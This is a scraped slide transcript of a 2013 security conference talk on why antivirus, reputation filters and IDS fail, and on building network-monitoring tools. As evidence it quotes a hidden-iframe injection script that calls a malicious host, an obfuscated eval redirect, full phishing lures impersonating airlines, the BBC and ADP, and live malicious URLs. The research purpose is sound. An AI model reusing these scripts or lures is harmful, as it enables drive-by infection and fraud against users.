SlideShare a Scribd company logo

whats wrong with modern security tools and other blurps

F _, profile picture
F _

This document discusses the limitations of modern network security tools and techniques. It provides examples of how malware authors are able to evade detection from antivirus software, network filters, and other defenses by using techniques like domain generation algorithms, encoding payloads in images and documents, and compromising legitimate websites and infrastructure to host and distribute attacks. The document argues that security vendors struggle to keep up with the constantly evolving tactics of cybercriminals, and that non-targeted social engineering attacks remain an effective way to compromise users.

Technology
1 of 139
Downloaded 48 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
Why there is no Silver Bullet Whats Wrong with modern security tools: Exploring (in)accuracy and (in)correctness of modern network defense products GroundZero 2013 V. Kropotov; F. Yarochkin; V. Chetvertakov
About speakers ● ● ● Our interests are studying malicious behavior on the network traffic We get greater visibility of on-going activities by monitoring network traffic in Russia and Taiwan We are very interested in expanding So if you have pcaps to share, talk to us :-D @fygrave @vbkropotov @sinitros89
Agenda (PT1) ● Security Threats Landscape (intro) ● AV Trolls ● NetSec Trolls ● Combo Trolls ● What else could go wrong ;) ● Conclusion
We work together as a research team Today's two presentation topics are connected. The second presentation will be a logical continuation of the this talk
Security Threats Landscape
Traffic drives cybercrime economy ● You can learn quite abit about primary victims by simply reading thematic forums :) Traff Pricing Source: A botnet load selling portal
How to get traff ● Web servers compromise (most common) ● DNS servers or domain names hijacked (add examples from afraid.org) ● ● Banner campaign (adserver/openx compromise. (swiss-cheese ;)) Other infrastructure compromised. Example: memcache poisoning
Primary victims ● About 40 000 000 Internet users in Russia According our stats: ● For every 10 000 hosts in Russia ● 500 hosts redirected to landing page every week ● 25-50 hosts with typical protection scheme (NAT, proxy with antivirus, vendor supplied reputation lists, etc.) are COMPROMISED
Malicious Campaigns In 2013
News/Media outlets are very popular this year Domain Resource type Campaign dates unique hosts per day News – official gov publisher news Autumn 2013 ~ 790 000 Winter 2013 – Autumn 2013 ~ 590 000 gazeta.ru news Spring 2013 - Autumn 2013 ~ 490 000 aif.ru news Spring 2013 - Autumn 2013 ~ 330 000 mk.ru news Summer 2013 ~ 315 000 vz.ru news Winter 2013 – Summer 2013 ~ 170 000 lifenews.ru news Summer 2013 ~ 170 000 topnews.ru news rg.ru newsru.com Spring 2013 - Autumn 2013 ~ 140 000
Video, mail, regional gov – you choose...! Domain Resource type Youtube.com When seen unique hosts per day Summer 2013 - Autumn 2013 (malvertising?!) Alexa N 3 mail.ru Public email, search engine Winter 2013 Alexa N 33 Vesti.ru TV news Winter 2013 ~ 1 050 000 tvrain.ru TV Autumn 2013 ~ 250 000 mos.ru Moscow gov portal Winter 2013 – Spring 2013 ~150 000 glavbukh.ru Accountants Spring 2013 - Autumn 2013 ~65 000 tks.ru Finance (Import/Explort) Summer 2013 - Autumn 2013 ~38 000
Oops, a regional GOV resource, July 2013 <script src="http://changeip.changeip.name/rsize.js">
So you have your exploit crawling framework? - can it move the mouse too... :) <script src="http://changeip.changeip.name/rsize.js"> ● ● res='bhduqnd.selfip.org';var astatf = 0; ● document.write("<head></head><b><div id='accountil'></div></b>"); ● document.onmousemove=jsstatic; ● function jsstatic() { if (astatf == 0) { astatf++; text = "<iframe src='http://"+res+"/bashimme/2' width='7' height='12' style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'></iframe>"; ● document.getElementById("accountil").innerHTML = text }} ● </script>
Meet the exploit-serving BING
dns abuse of a legit domain ● domain: SCHOOLOPROS.RU ● nserver: ns1.afraid.org. ● nserver: ns2.afraid.org. ● state: REGISTERED, DELEGATED, VERIFIED ● org: LLC "GKShP" ● registrar: ● admin-contact: https://www.nic.ru/whois ● created: ● paid-till: ● free-date: RU-CENTER-REG-RIPN 2010.01.25 2014.01.25 2014.02.25I
How are you going to blacklist this?! deaswqwehdskdqw.homelinux.com → 176.31.140.65 ● ● b3f21817812f11a62eb1b506.homelinux.com → 93.189.29.235 5f87b942cfa67def68889b81.homelinux.com → 93.189.29.235 lapachka.info → 93.189.29.235 Domain Name:LAPACHKA.INFO Created On:05-Jun-2013 20:31:33 UTC Last Updated On:20-Aug-2013 07:36:23 UTC Expiration Date:05-Jun-2014 20:31:33 UTC Sponsoring Registrar:DomainContext Inc. (R524-LRMS)
File extension based filters?! http://hk.sz181.com/images/c4a.jpg ← Win32 Executable (payload) Domain Name:sz181.com Record last updated at 2013-03-11 09:27:18 Record created on 3/10/2005 Record expired on 03/10/2014 name:(ShenZhen Johns Property Accessory Supply Co.,LTD) mail:(kf@johns168.com) +86.75526919616 +86.75526919856 ShenZhen Johns Property Accessory Supply Co.,LTD <object width="640" height="60" classid="clsid:D27CDB6E-AE6D-11cf-96B8-4 src="http://www.35.com/upload/35WHOIS_FLASH__640_60.swf" width="640" Billing Contactor: ShenZhenShi ShenNanDaDao1021 Hao XiNianZhongXin 12A03 SHENZHEN Guangdong, 18 CN 518040
So how fast are Security Vendors with new signatures?! ● AntiVirus Vendors – Hours..Days ● Network Proxy Filtering - Days..Weeks ● Other network security – Days..Weeks..Months ..?
Updates are dangerous too. This kills an executable from a legit SAP installation 20
so.. the FUI (Fuck up indicators) ● Antivirus == damn good Fuck Up indicator of your daily monitoring work. If you see ex. CVE-2012-0158 the e-mail, received 1 year ago - you see you fucked it up a year ago, but now must be able to react. :) 25.10.2012 18:01 Test_host01 Exploit-CVE2012-0158.f!rtf Undetermined clean error, deleted successfully C:Documents and SettingsUser02Desktop2readModern energy in China.msg68.OLE 25.10.2012 18:01 Test_host01 Exploit-CVE2012-0158.f!rtf Undetermined clean error, deleted successfully C:Documents and SettingsUser02Desktop2readUS energy.msg68.OLE 21
Email as attack vector.. are you a target? APT? Non-targeted ● ● ● Single exploit Content of the mail is accurate to context Specific payload behavior (stats) ● ● Mass-mailed Often no exploit used (.exe in attach)
APT through email.. An RTF document (CVE-2012-0158 - "MSCOMCTL.OCX RCE Vulnerability." ) Payload writes a dll file Recent build date (2013) Autorun for persistence Calls back to C2 server group Suspicious user Agents: Mozilla/4.0 (compatible; MSIE 6.0.1.3; Windows NT 5.0.3) Mozilla/4.0 (compatible; MSIE 5.0.2) Mozilla/4.0 (compatible)
Owning a network.. ● Vulnerabilities seen in use through this attack vector: MS Office Adobe Acrobat reader CVE-2013-0640 CVE-2012-0775 Adobe flash player CVE-2012-1535 CVE-2012-0158 CVE-2011-1269 CVE-2010-3333 CVE-2009-3129 Java CVE-2013-0422 CVE-2012-1723 CVE-2012-5076
But... ● Human stupidity is exploited more than ever..
Email with a password protected archive or a document ● ● ● Password protected archives bypass AV checks, firewall/WAF/.. detection No exploit. Executable File is masked as document (icon, extension) Message contents motivates user to open the attachment (social engineering)
Lets look at some examples Добрый день, По результатам проверки, у нашей фирмы обнаружился долг перед Вами за январь на сумму 9540 рубл. Наш главбух составила акт сверки и просит подписать данный акт и выслать его скан. А также спрашивает, что лучше написать при переводе средств. ______________________________________________________________ _______________________ С уважением, комерческий директор ОАО "М-ТОРГ" Маркина Ольга Алексеевна ps. акт сверки в приложении к письму, пароль к архив 111
Examples (cont...) Добрый день, По результатам аудиторской проверки, у нашей фирмы обнаружился долг пере Вами за декабрь 2012г. в сумме 49540 рубл. Наш главбух составила акт сверки и просит подписать данный акт и выслать его скан. А также спрашивает, что лучше написать при переводе средств. _______________________________________________________________________ ________ С уважением, бухгалтер ЗАО "МСК" Калинина Вера Владимировна ps. акт сверки в приложении к письму, пароль к архиву 123 Good afternoon, According to the results of the audit, our firm will transfer the debt to you for? December 2012. in the sum of 49540 rubles. Our chief accountant make an act of reconciliation and asked to sign the act and send it’s scan. ______________________________________________________________________________ Sincerely, Accountant of "MSK"? Vera V. Kalinina P.s. statement attached to the letter, the password for the archive 123
.. and inside archive :) Unpacked file
Another example Subject: British Airways E-ticket receipts e-ticket receipt Booking reference: 05V9363845 Dear, Thank you for booking with British Airways. Ticket Type: e-ticket This is your e-ticket receipt. Your ticket is held in our systems, you will not receive a paper ticket for your booking. Your itinerary is attached (Internet Exlplorer/Mozilla Firefox file) Yours sincerely, British Airways Customer Services British Airways may monitor email traffic data and also the content of emails, where permitted by law, for the purposes of security and staff training and in order to prevent or detect unauthorised use of the British Airways email system. British Airways Plc is a public limited company registered in England and Wales. Registered number: 89510471. Registered office: Waterside, PO Box 365, Harmondsworth, West Drayton, Middlesex, England, UB7 0GB. How to contact us Although we are unable to respond to individual replies to this email we have a comprehensive section that may help you if you have a question about your booking or travelling with British Airways. If you require further assistance you may contact us If you have received this email in error This is a confidential email intended only for the British Airways Customer appearing as the addressee. If you are not the intended recipient please delete this email and inform the snder as soon as possible. Please note that any copying, distribution or other action taken or omitted to be taken in reliance upon it is prohibited and may be unlawful.
Another variation: email that contains masked links to malicious pages •No attachment. The message text is html/text points to the same resource •All links are 'masked' to be pointing to legit links •The same attreactive text of the message
Encoded redirect.. <body> <h1><b>Please wait. You will be forwarded.. . </h1></b> <h4>Internet Explorer / Mozilla Firefox compatible only</h4><br> <script>ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151} catch(gdsgd){v="val";if(document)try{document.body=12;}catch(gdsgsdg) {asd=0;try{}catch(q){asd=1;}if(!asd) {w={a:window}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(118,96,112,49,60,50,57,58,8,118,96,112,50,60,116,97,113,47,59,9,103,102, 39,116,97,113,47,61,60,116,97,113,48,41,31,121,100,110,97,117,108,99,110,115, 44,108,110,97,97,115,103,111,109,59,34,103,114,116,111,56,47,46,100,111,113, 115,109,44,106,97,45,112,117,57,54,48,55,46,47,101,109,114,116,107,47,107,10 3,110,106,113,47,98,109,108,116,107,110,45,110,104,111,32,59,124);}w=f;s=[];i f(window.document)for(i=2-2;-i+104!=0;i+=1) {j=i;if((031==0x19))if(e)s=s+ff(w[j]+j%zz);}xz=e;if(v)xz(s)}</script> </body> </html>
Hot topic for big company, Cyprus Crisis Diana Ayala saw this story on the BBC News website and thought you should see it. ** Cyprus bailout: bank levy passed parliament already! ** Cyprus can amend terms to a bailout deal that has sparked huge public anger.... < http://www.bbc.com.us/go/em/news/world-cyprus-57502820> ** BBC Daily E-mail ** Choose the news and sport headlines you want - when you want them, all in one daily e-mail < http://www.bbc.co.uk/email> ** Disclaimer ** The BBC is not responsible for the content of this e-mail, and anything written in this e-mail does not necessarily reflect the BBC's views or opinions. Please note that neither the e-mail address nor name of the sender have been verified. If you do not wish to receive such e-mails in the future or want to know more about the BBC's Email a Friend service, please read our frequently asked questions by clicking here
This message is to notify you that your package has been processed and is on schedule for delivery from ADP. Here are the details of your delivery: Package Type: QTR/YE Reporting Courier: UPS Ground Estimated Time of Arrival: Tusesday, 5:00pm Tracking Number (if one is available for this package): 1Z023R961390411904 Details: Click here to view and/or modify order We will notify you via email if the status of your delivery changes. -------------------------------------------------------------------------------Access these and other valuable tools at support.ADP.com: o Payroll and Tax Calculators o Order Payroll Supplies, Blank Checks, and more o Submit requests online such as SUI Rate Changes, Schedule Changes, and more o Download Product Documentation, Manuals, and Forms o Download Software Patches and Updates o Access Knowledge Solutions / Frequently Asked Questions o Watch Animated Tours with Guided Input Instructions Thank You, ADP Client Services support.ADP.com -------------------------------------------------------------------------------This message and any attachments are intended only for the use of the addressee and may contain information that is privileged and confidential. If the reader of the message is not the intended recipient or an authorized representative of the intended recipient, you are hereby notified that any dissemination of this communication is strictly prohibited. If you have received this communication in error, notify the sender immediately by return email and delete the message and any attachments from your system.
What happens if you click..
AV logs – useful ;) Antivirus find exploit in cache -> we was attacked -> antivirus saves us! ;-) The exploit can be in cache – AV finds it :)
s AV actually removes a forensic trace. PROFFIT :)
Incident entry point ● ● Many vendors able to mine their clouds But you need know a starting point for your exploration ...
Death of AVs as we know them ● Automatic malicious binaries builders – Unskilful attacker can produce unique binaries with a single click One sig per binary makes you transfer Tbs of data to end-user machines :) A simple solution – move sigs into cloud :-)
AV trolls
Dr. Web
TrendMicro
AV behaviour is not new ● EmergingThreats rule, first added 2011-06-27 20:14:35 UTC alert udp $HOME_NET any -> any 53 (msg:"ET CURRENT_EVENTS Large DNS Query possible covert channel"; content:"|01 00 00 01 00 00 00 00 00 00|"; fast_pattern; depth:10; offset:2; dsize:>300; content:!"youtube|03|com|00|"; content:!"sophosxl|03|net|00|"; content:!"|0a|hashserver|02|cs|0a|trendmicro|03|com|00|"; content:!"spamhaus|03|org|00|"; classtype:bad-unknown; sid:2013075; rev:7;)
AV trolls ● Date/Time 2011-09-06 17:13:05 MSD ● Tag Name PDF_XFA_Script ● Severity Low ● Target IP Address ● Target Port 9090 ● Source IP Address 10.y.y.y ● SourcePort Name 3201 ● arg ● 10.x.x.x host=http://sonorophone.in&b=af7bb2f
whats wrong with modern security tools and other blurps
VT says nothing? payload in .jar feb 2013 46
AV is silent during attack, WHY?
Just because malware obfuscation service is available ● 70$ per month, is it OK, * * Max Goncharov Talk at PHDaysIII
So how do you know when to reencrypt?
Example, Aug 2013 <object height="0" align="left" width="0" type="text/html" data="http://wrutr.VizVaz.com/viewforum.php? b=cc119b1"></object>
Attack in Fiddler
August 2013 https://www.virustotal.com/en/file/70c21fb812665fc1d75b158b7a48f4e85cbaf5bcc37a2dfd0d0555a7f561f9a8/analysis/1376491063/ https://www.virustotal.com/en/file/deeee11c34a55901e368db3a715419ae886a33be3f504fd1203076b6eeb62502/analysis/1376490991/
Detection During the Time October 2013 53
Side effects of heuristic detection August 2013 October 2013 54
55
AV claims: VT is Not Fair?? 23.01.13 19:56 Detected: Trojan-Spy.Win32.Zbot.aymr C:/Documents and Settings/user1/Application Data/ Sun/Java/Deployment/cache/6.0/27/4169865b-641d53c9/UPX 23.01.13 19:56 Detected: Trojan-Downloader.Java.OpenConnection.ck C:/Documents and Settings/user1/Application Data/ Sun/Java/Deployment/cache/6.0/48/38388f30-4a676b87/bpac/b.class 23.01.13 19:56 Detected: Trojan-Downloader.Java.OpenConnection.cs C:/Documents and Settings/user1/Application Data/Sun/Java/Deployment/cache/6.0/48/38388f30-4a676b87/ot/pizdi.class 23.01.13 19:58 Detected: HEUR:Exploit.Java.CVE-2013-0422.gen C:/Documents and Settings/user1/Local Settings/ Temp/jar_cache3538799837370652468.tmp 56
Yes. You have been compromised one week before... 1/14/2013 18:57 178.238.141.19 http://machete0-yhis.me/ pictures/demos/OAggq application/x-javaarchive 1/14/2013 18:57 178.238.141.19 http://machete0yhis.me/pictures/demos/OAggq application/x-javaarchive 1/14/2013 18:57 178.238.141.19 http://loretaa0application/octetshot.co/careers.php? stream cert=561&usage=392&watch=4 &proxy=49&ipod=171&shim=34 4&pets=433&icons=252&staff=6 21&refer=345 * reproduced on the stand, to estimate Vendor signatures updated time 57
Avs are still useful.. lets look at some examples ● Bootkits ● Rootkits ● Others 58
Appropriate AV use 30.10.2013 file infected. Undetermined clean 5:46 error, deleted successfully Generic.dx! 4C9C664321AD c:Total Commander 7.00 PP 0.50 .exeFITW.EXE 30.10.2013 file infected. Undetermined clean 6:37 error, deleted successfully Generic.dx! 4C9C664321AD c:Total Commander 7.00 PP 0.50 .exeFITW.EXE 30.10.2013 file infected. Undetermined clean 6:44 error, deleted successfully Generic.dx! 4C9C664321AD c:Total Commander 7.00 PP 0.50 .exeFITW.EXE 30.10.2013 file infected. Undetermined clean 6:50 error, deleted successfully Generic.dx! 4C9C664321AD c:Total Commander 7.00 PP 0.50 .exeFITW.EXE 30.10.2013 file infected. Undetermined clean 6:57 error, deleted successfully Generic.dx! 4C9C664321AD c:Total Commander 7.00 PP 0.50 .exeFITW.EXE 30.10.2013 file infected. Undetermined clean 6:58 error, deleted successfully Generic.dx! 4C9C664321AD c:Total Commander 7.00 PP 0.50 .exeFITW.EXE 30.10.2013 file infected. Undetermined clean 7:01 error, deleted successfully Generic.dx! 4C9C664321AD c:Total Commander 7.00 PP 0.50 .exeFITW.EXE 30.10.2013 file infected. Undetermined clean 7:04 error, deleted successfully Generic.dx! 4C9C664321AD c:Total Commander 7.00 PP 0.50 .exeFITW.EXE 30.10.2013 file infected. Undetermined clean 7:11 error, deleted successfully Generic.dx! 4C9C664321AD c:Total Commander 7.00 PP 0.50 .exeFITW.EXE 59
Appropriate AV use Cases, Email under attack, exe usually not targeted Event Generated Time (UTC) Threat Name Event Category Threat Type Threat Target File Path 10/23/13 12:03:54 AM PWSZbot-FIU! 059FF890153F Malware detected Trojan KURUOGLU 5 Enquiry.zipKURUO GLU 5 Enquiry..exe 10/25/13 4:55:37 AM PWSZbot-FIU! BC53FFF6285 D Malware detected Trojan Info_Invoice..no.16 6583.zipInfo_Invoic e..no.166583.exe 60
Appropriate AV use Cases, Office documents ● ● ● Event Generated Time (UTC): 7/8/13 12:25:46 PM Threat Source User Name: "Sports .ru" <sport.info@bk.ru> Threat Target File Прогнозы на Евро 2012 от экстрасенсов и аналитиков.doc* ● Event Category: Malware detected ● Threat Name: Exploit-CVE2012-0158.b!rtf ● Threat Type: Virus ● Action Taken: Deleted * Euro 2012 forecast from ... doc 61
Appropriate AV use Cases, The same file was deleted, but many times Threat Target File Path Threat Name Event Received Action Time (UTC) Taken RDN/Generic.dx! cmr 10/27/13 9:56:54 PM Deleted C:Documents and SettingstestuserApplication Datasvchost.exe RDN/Generic.dx! cmr 10/28/13 10:05:06 PM Deleted C:Documents and SettingstestuserApplication Datasvchost.exe RDN/Generic.dx! cmr 10/29/13 9:54:37 PM Deleted C:Documents and SettingstestuserApplication Datasvchost.exe RDN/Generic.dx! cmr 10/30/13 5:23:49 AM Deleted C:Documents and SettingstestuserApplication Datasvchost.exe RDN/Generic.dx! cmr 10/30/13 9:42:07 PM Deleted C:Documents and SettingstestuserApplication Datasvchost.exe RDN/Generic.dx! cmr 10/31/13 9:55:37 PM Deleted 62 C:Documents and SettingstestuserApplication
Network Security Tools LoLs and Trolls :)
Vendor FP 64
Vendor FP 65
DNS Traffic Analysis.. What you can do with this event?
“REP.xlfkl”, is it dangerous?
Where is the booby trap
Unfortunately it is HERE
Yep, vendor were able to detect APT
Appropriate Network tools use ● Pray ● Detect as you can ● Check, maybe your vendor supplied tool detected it somehow, and you can use this information, but next time Date/Time 2012-05-15 11:50:16 Tag Name HTTP_Post Severity Low Observance Type Intrusion Detection Target IP Address 74.63.83.38 :server be4appy.com :URL /rep/cim.php algorithm-id 3000003 Packet DestinationPort 80 71
Oh, yepp, Web proxies
Reputation filters
Exploit Kits and TDS now personal? ● hxxp://get.adnova.ru/?v2=1&ver=2&pad=2943&block=1362768946&url=http%3A%2F %2Fratushnyak.org%2Fpage%2Fshark-cartilage.html&ref=http%3A%2F%2Fnova.rambler.ru%2Fsearch %3Fquery%3D%25D0%25B0%25D0%25BA%25D1%2583%25D0%25BB %25D0%25B8%25D0%25B9%2B%25D1%2585%25D1%2580%25D1%258F%25D1%2589%2B %25D0%25BE%25D1%2582%25D0%25B7%25D1%258B %25D0%25B2%25D1%258B&sw=1280&sh=1024&cw=1189&ch=879&fl=0&nc=0.2519320439819137 --> ● gendarme795.kiltie146.dyndns-pics.com 54.217.234.176 80 GET ● hxxp://gendarme795.kiltie146.dyndns-pics.com/?in=51118 ● Personal Network Storage, Internet Services Wed, 23 Oct 2013 12:20:25 GMT
Exploit Kits and TDS now personal? ● hxxp://nashaporno.ru/ --> 176.122.88.106 qzzj.dyndns.tv ● GET ● Tue, 08 Oct 2013 06:58:32 GMT ● hxxp://qzzj.dyndns.tv/out.php?sid=1 Personal Network Storage, Internet Services
May be forums? ● ● 37.9.52.134 80 GET hxxp://bzsdrt.attraction-visitors.ru/ viewforum.php?b=ca3990d text/html ● Tue, 15 Oct 2013 06:51:39 GMT ● Forum/Bulletin Boards
Or Internet Services ● ● 37.9.52.103 hxxp://uistodr.is-an-accountant.com /viewforum.php?b=75c3d28text/html ● Wed, 16 Oct 2013 11:24:53 GMT ● Internet Services
Oops, innovate search engine? ● ● 95.211.39.86 tanyauaa90.ru http://tanyauaa90.ru/tuka4/?1&se_referer=http%3A%2F%2Fnova.rambler.ru %2Fsearch%3Fquery%3D %25D1%2586%25D0%25B5%25D1%2580%25D0%25BE %25D0%25B1%25D1%2580%25D0%25B0%25D0%25B7%25D0%25B5%2 5D0%25BB%25D0%25B8%25D0%25BD%2B%25D0%25BF %25D1%2580%25D0%25BE %25D0%25B8%25D0%25B7%25D0%25B2%25D0%25BE %25D0%25B4%25D0%25B8%25D1%2582%25D0%25B5%25D0%25BB %25D1%258C&referer=http%3A%2F%2Fspireritmen1293.dlinkddns.com %2Foe4500drajverad555%2Fcerobrazelin_instrukciya_po_primeneniyu_cen a.html ● Fri, 18 Oct 2013 08:39:17 GMT ● Search Engines, Internet Services domain: registrar: created: ● ● TANYAUAA90.RU REGRU-REG-RIPN 2013.10.17
Or Even Wiki page ● benefaction.ru.heaven774.blogdns.com 54.217.234.176 http://benefaction.ru.heaven774.blogdns.com/ ?in=55530 ● Tue, 08 Oct 2013 12:15:03 GMT ● Blogs/Wiki
Reputation filters won't help here ● On available Environments less than 10% of malicious resources categorized as malicious bu vendor supplied reputation filters during October 2013
Reputation filters won't help here URL on the same site: alldistributors.ru/image/ Site: alldistributors.ru 81
Yep, they are all legit!
Some of them older than 10 years ● ● Over 500 compromised domains in 24 hours Domain rotation once per minute (3 minutes in the other incident)
What do you know about more sophisticated bots?
Proliferation of malware that uses blogging/social networks as c2 Explore header anomaly GET / …. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: Connection: Cache-Control: Pragma:
88 Elirks: v01  Reported by Dell/Secureworks as Elirks http://www.secureworks.com/cyber-threatintelligence/threats/chasing_apt/
89 Elirks, v02 http://tw.myblog.yahoo.com/jw! uzrxZwSGHxowPMGZAaj4I50http://blog.yam.com/minzhu0906/article/54726977 http://diary.blog.yam.com/bigtree20130514/article/101 73342 http://tw.myblog.yahoo.com/jw! uzrxZwSGHxowPMGZAaj4I50http://blogs.yahoo.co.jp/sakasesi2013/31805794.html http://www.plurk.com/mdbmdb
90 Campaigns can be linked by the same IP sources to access web Managed by the same IP addresses (easy to cross-correlate)
Ready to catch them?
Scalable Tools for Advanced Network Monitoring Discover malware operations with your bare hands V. Kropotov; F. Yarochkin
Gaand de Dhakkan FOR YOUR NETWORK :)
Agenda The battle field: network traff 0.5% of your traffic is what you really want.. now what..? Off-shelf tools and their problems Automation of manual work. Alot of automation Examples and Case studies Conclusions
Disclaimer We'll mainly talk about our experience with scalable network monitoring. Some of the tools we are about to mention, we have developed ourselves. Other tools are done by other great guys and we are heavy users of those.
Monitoring VS Protection ● Strange, but true Efficiency(Monitoring)~O(1/ Efficiency(Protection))
Passive detection VS Active protection ● False positives for these methods ● The cost of the time lag with passive detection ● The cost of DoS from Active protection
Incident Mitigation VS Investigation ● If your preparation is not enough Efficiency(Mitigation)~ O(1/ Efficiency(Investigation)) ● If you prepared, almost all steps of Investigation you can do asynchronously
Not typical approaches ● ● ● Snapshotting DNS Analysis and traffic Redirection (Internal sinkholing) Sandboxing
Systematic Defense ● ● ● What to look at How to look at your data Rinse and repeat ;-) How to prepare well for an attack (you can't walk into the same river twice, so 'preserve' the flow) 100
Old skool network analysis :) Snort is handy ● Single node ● Patterns specified in rule files ● You get notified when alert occurs ● You can specify some auto-reactive rules to act real-time
What's missing ● ● ● ability to capture from multiple nodes and merge the results (me → snortnet, 1999 :p) Your snort (or any other IDS) will miss stuff that is not in signatures, now what .. Running experimental analytics, FP analysis on IDS results is very difficult because there is no 'raw data'
Solution: Store everything!? :-D Just like ||SA! ;­)
Now made possible.. We need a more than one node to store data We need some sort of data management plan And .. A convenient way of finding things.. quick!
ElasticSearch ● really awesome, all my data lives here ;)
ES ● ● Multiple Indices, easy cross-correlation, data HA, Lucene-based search capability Design your data flow smartly (simple things: indices are fast to remove, individual items – are not, store metadata, keep raw data where it was captured)
So what we store ● Our feeds into ES: – Honeypot logs – Network monitoring with eyeipflow scriptlets – Network data from Moloch – DNS traff analysis – User-Agent/IP/time maps
What to look at.... ● ● Suspicious agents – works nicely (and easy to implement with snort, surricata, etc) Time-series traffic analysis Emerging Threats has a large number of APT related sigs. Take-and-modify :)
Not only payload used as transition (covert channel in URL) ● GET hxxp://lionsholders.biz/st.php? os=windows %207&browser=msie&browserver=8.0& adobe%20reader=10.1&adobe %20flash=11.7.700.169&windows%20media %20player=12.0.7601.17514&java=0&silverli ght=0
Honeypots ● Service-simulation honeypots. Collect plenty tracers on random network opportunists. – Ex: kippo (modified to keep trace-log in ES):
Nice collection of Romanian tools over the years ;-)
eyeipflow ● ● ● Libwireshark + python + yara. Capable of processing pcap files that you collect elsewhere. Libsniff-ng is good for high-volume traff Store meta-data on various protocol transactions: HTTP, SMTP, DNS ..
And then we discovered Moloch :)
Moloch Uses libnids for packet reassembly Multi-protocol Supports yara Actively developed Supports plugin architecture Custom taggers are extremely useful
Moloch with plugins (on DRUGS!) Moloch is developed by a team at AOL and released open-source at http://github.com/aol/moloch/
Introduction to writing... moloch plugins
Introduction to writing moloch plugins ● moloch_plugin_init() { moloch_plugin_register(“leet”, FALSE); /* register callbacks */ moloch_plugin_set_cb(“leet”, A, B, C, D, E, F, H, I } /* the rest of your init stuff */ }
Moloch plugins (pt 2) ● Callbacks: – A) MolochPluginIpFunc ipFunc, – B) MolochPluginUdpFunc udpFunc, – C) MolochPluginTcpFunc tcpFunc, – D) MolochPluginSaveFunc preSaveFunc, – E) MolochPluginSaveFunc saveFunc, – F) MolochPluginNewFunc newFunc, – G) MolochPluginExitFunc – H) MolochPluginReloadFunc reloadFunc exitFunc,
And even more ● moloch_plugins_set_http_cb( …
Redundancy Properties in the malware distribution and postinfection activities campaigns
Passive DNS data is used to identify DGA malware C2 servers
Passive HTTP monitoring and anomaly detection Wavelet-based analysis
Proxy logs at glance example 129
User-agent vulnerable clients monitoring 130
User-agent request example, Why legit Win8 is here? 131
Silent Debugging?? Host, OS, more than other 20 params.. ● Local host name HMS0277 X-Client/AppexWin8 X-Client-AppVersion/1.2.0.135 09.08.2013 8:13 131.253.40.10 80 GET ● http://g.bing.net/8SE/201? MI=FED21F3944A344D38E5C61C00AC78AC3&AP=3&LV=1.2 .0.135&OS=W8&TE=1&TV=ts20130613214629143%7Ctz240%7Ctmru-ru %7Ctc1%7Cdr8%252C0%7Caa1058%252F1%252C0%252F0 %7CdaHMS0277%7CorRU %7Cwa1%7Cde4%7Cad1%252C0%7Ccd9%252C0%7Cdd0% 7Ctp20130505%7Cccrow %7Cdc1%7Cpd1%252C0%7Cto4%7Clc1%252C0%252C0%25 2C0%7Cdb1 132
User-agent anomaly monitoring 133
Proxy logs processing The ideas see the code example in our git https://github.com/fygrave/ndf 1. Take predefined patterns for log fields and calculate log line score. Depending on score write down line into colored (EB,B,W,EW,Gr) list for further investigation (--list) 2. Find all lines with field matched specified pattern – smth. like egrep+cutawk (--match) 134
General course of work (list search) 135
General course of work (match search) 136
The scenario 1. --list ==> Scored rows with signatures ==> Users in troubles 2. --match ==> Find all history about users in troubles – before and after signature ==> Further manual investigation 3. Update signatures if need to 137
Yara - based Easy to integrate with your scripts Integration with a proxy server is possible via icap yara plugin: https://github.com/fygrave/c_icap_yara (inline analysis) Raw network traffic monitoring project (and http/DNS indexing): https://github.com/fygrave/eyepkflow (passive HTTP)
Detecting typical fields inside payload ● For example (YARA): Rule SploitMatcher { strings: $match01 = "com.class'" $match02 = "edu.class" $match03 = "net.class" $match04 = “security.class” condition: all of them } Problem: you can't deobfuscate javascript with Yara. But you can block the payload, Which would be fetched by the javascript, thus break the exploitation chain. 139
Or you can roll your own.. personal crawler with yara and jsonunpack :) see the code example in our git https://github.com/fygrave/ndf 140
Other cool YARA tools Moloch https://github.com/aol/moloch Yara mail https:// github.com/kevthehermit/yaraMail Yara pcap https:// github.com/kevthehermit/YaraPcap
What we will see in 2014 ● ● ● ● ● Android based platforms would be one of the primary targets Vendor supplied reputation filters won't be so effective, due the compromised legit domains pool size Commercially oriented cyber criminals will use non standard ports, abused hosting, DNS servers and short time frames as now in Russia. Cyber criminals will act outside the country of their residence (it's better for Russia, but only for Russia...) Defenders will use more and more own signatures, rules, tools and pills to survive.
Forecast for 2014: Roll your own.. To survive in this dangerous environment. 143
Conclusion We've seen interesting techniques We've seen that the 'low-hanging fruit' is not so low anymore :)
Now it is the time for questions And throwing your shoes ;-)
Collaboration via hpfeeds
Tools  Developed by our lab: − − DNSLyzer http://gtihub.com/fygrave/dnslyzer −  Eyepkflow http://github.com/fygrave/eyepkflow HPFeeds Broker – no public release 3rd party tools we use: − Redis, ElasticSearch, Moloch, Hpfeeds library, RabbitMQ, zmap
